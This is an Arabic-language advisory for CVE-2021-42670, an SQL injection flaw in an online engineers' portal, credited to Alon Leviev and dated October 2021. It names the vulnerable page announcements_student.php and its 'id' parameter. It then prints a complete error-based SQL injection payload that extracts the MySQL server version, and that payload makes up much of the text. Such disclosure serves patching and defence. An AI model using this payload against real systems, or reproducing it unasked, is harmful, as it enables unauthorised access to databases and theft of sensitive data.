
CVE-2021-42670 - ثغرة حقن SQL في نظام بوابة المهندسين عبر الإنترنت.
CVE-2021-42670 - ثغرة حقن SQL في نظام بوابة المهندسين عبر الإنترنت.
توجد ثغرة حقن SQL في بوابة المهندسين عبر الإنترنت. يمكن للمهاجم استغلال المعامل "id" القابل للاستغلال في صفحة الويب "announcements_student.php" للتلاعب باستعلام SQL المنفذ. ونتيجة لذلك، يمكن للمهاجم استخراج بيانات حساسة من خادم الويب.
المكونات المتأثرة -
الصفحة القابلة للاستغلال - announcements_student.php
المعامل القابل للاستغلال - "id"
ستسمح لك الحمولة التالية باستخراج إصدار خادم MySQL قيد التشغيل على خادم الويب -
1' AND (SELECT 4356 FROM(SELECT COUNT(*),CONCAT(0x7178787071,(MID((IFNULL(CAST(VERSION() AS NCHAR),0x20)),1,51)),0x7178786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'pMLo'='pMLo

Alon Leviev(0xDeku)، 22 أكتوبر، 2021.